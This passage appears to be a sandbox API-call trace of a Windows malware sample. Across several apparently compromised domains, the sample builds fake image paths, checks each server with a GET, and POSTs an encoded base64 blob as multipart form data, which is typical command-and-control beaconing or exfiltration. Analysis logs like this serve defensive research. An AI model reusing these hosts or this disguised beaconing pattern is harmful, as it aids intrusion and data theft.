(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0127.654] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0127.654] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0127.654] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0127.654] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.654] InternetConnectW (hInternet=0xcc0004, lpszServerName="marketisleri.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0127.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0127.654] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="data/pictures/fuessozu.png") returned 26 [0127.654] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="data/pictures/fuessozu.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0127.655] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0127.862] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0127.862] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0127.862] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.863] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.863] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0127.863] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.toflyaviacao.com.br") returned 30 [0127.863] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0127.863] lstrcpyW (in: lpString1=0x2e8da80, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0127.863] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="ke" | out: lpString1="ke") returned="ke" [0127.863] lstrcatW (in: lpString1="ke", lpString2="ru" | out: lpString1="keru") returned="keru" [0127.863] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0127.864] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.toflyaviacao.com.br/static/tmp/keru.jpg") returned 50 [0127.864] lstrlenW (lpString="http://www.toflyaviacao.com.br/static/tmp/keru.jpg") returned 50 [0127.864] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/tmp/keru.jpg" | out: lpString1="static/tmp/keru.jpg") returned="static/tmp/keru.jpg" [0127.864] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.864] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0127.864] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.toflyaviacao.com.br", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0127.864] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0127.864] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0127.864] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0129.381] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0129.381] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0129.381] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0129.382] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0129.382] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0129.382] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0129.383] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0129.383] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0129.383] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0129.383] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0129.383] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0129.384] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.toflyaviacao.com.br", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0129.384] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0129.385] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="static/tmp/keru.jpg") returned 19 [0129.385] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/tmp/keru.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0129.385] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0129.902] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0129.903] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0129.903] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.903] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.904] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0129.904] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.rment.in") returned 19 [0129.904] lstrcpyW (in: lpString1=0x2e8d880, lpString2="data" | out: lpString1="data") returned="data" [0129.904] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0129.904] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="de" | out: lpString1="de") returned="de" [0129.904] lstrcatW (in: lpString1="de", lpString2="im" | out: lpString1="deim") returned="deim" [0129.904] lstrcatW (in: lpString1="deim", lpString2="se" | out: lpString1="deimse") returned="deimse" [0129.904] lstrcatW (in: lpString1="deimse", lpString2="ru" | out: lpString1="deimseru") returned="deimseru" [0129.904] lstrcatW (in: lpString1="deimseru", lpString2="zu" | out: lpString1="deimseruzu") returned="deimseruzu" [0129.904] lstrcpyW (in: lpString1=0x2e8de80, lpString2="gif" | out: lpString1="gif") returned="gif" [0129.904] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.rment.in/data/imgs/deimseruzu.gif") returned 44 [0129.904] lstrlenW (lpString="http://www.rment.in/data/imgs/deimseruzu.gif") returned 44 [0129.904] lstrcpyW (in: lpString1=0x2e8d618, lpString2="data/imgs/deimseruzu.gif" | out: lpString1="data/imgs/deimseruzu.gif") returned="data/imgs/deimseruzu.gif" [0129.904] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0129.904] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0129.904] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.rment.in", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0129.904] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0129.905] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0129.905] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0133.676] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0133.676] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0133.676] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0133.678] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0133.678] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0133.678] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0133.679] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0133.679] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0133.679] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0133.679] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0133.679] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0133.679] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.rment.in", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0133.679] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0133.679] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="data/imgs/deimseruzu.gif") returned 24 [0133.679] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="data/imgs/deimseruzu.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0133.680] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0135.465] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0135.466] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0135.466] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.466] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.467] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0135.467] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.lagouttedelixir.com") returned 30 [0135.467] lstrcpyW (in: lpString1=0x2e8d880, lpString2="includes" | out: lpString1="includes") returned="includes" [0135.467] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0135.467] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="im" | out: lpString1="im") returned="im" [0135.467] lstrcatW (in: lpString1="im", lpString2="im" | out: lpString1="imim") returned="imim" [0135.467] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0135.467] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.lagouttedelixir.com/includes/pics/imim.png") returned 53 [0135.467] lstrlenW (lpString="http://www.lagouttedelixir.com/includes/pics/imim.png") returned 53 [0135.467] lstrcpyW (in: lpString1=0x2e8d618, lpString2="includes/pics/imim.png" | out: lpString1="includes/pics/imim.png") returned="includes/pics/imim.png" [0135.467] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0135.467] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0135.467] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.lagouttedelixir.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0135.467] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0135.467] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0135.467] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0135.616] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0135.616] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0135.616] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0135.618] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0135.618] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0135.618] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0135.618] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0135.618] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0135.618] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0135.618] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0135.618] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0135.618] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.lagouttedelixir.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0135.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0135.619] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="includes/pics/imim.png") returned 22 [0135.619] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="includes/pics/imim.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0135.619] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0136.167] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0136.170] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0136.170] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.180] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.181] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0136.181] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.krishnagrp.com") returned 25 [0136.181] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0136.181] lstrcpyW (in: lpString1=0x2e8da80, lpString2="assets" | out: lpString1="assets") returned="assets" [0136.181] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="da" | out: lpString1="da") returned="da" [0136.181] lstrcatW (in: lpString1="da", lpString2="fu" | out: lpString1="dafu") returned="dafu" [0136.181] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0136.181] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.krishnagrp.com/uploads/assets/dafu.jpg") returned 49 [0136.182] lstrlenW (lpString="http://www.krishnagrp.com/uploads/assets/dafu.jpg") returned 49 [0136.182] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/assets/dafu.jpg" | out: lpString1="uploads/assets/dafu.jpg") returned="uploads/assets/dafu.jpg" [0136.182] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0136.182] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0136.182] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.krishnagrp.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0136.182] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0136.182] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0136.182] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0138.594] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0138.594] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0138.594] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0138.596] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0138.596] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0138.596] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0138.596] lstrlenA 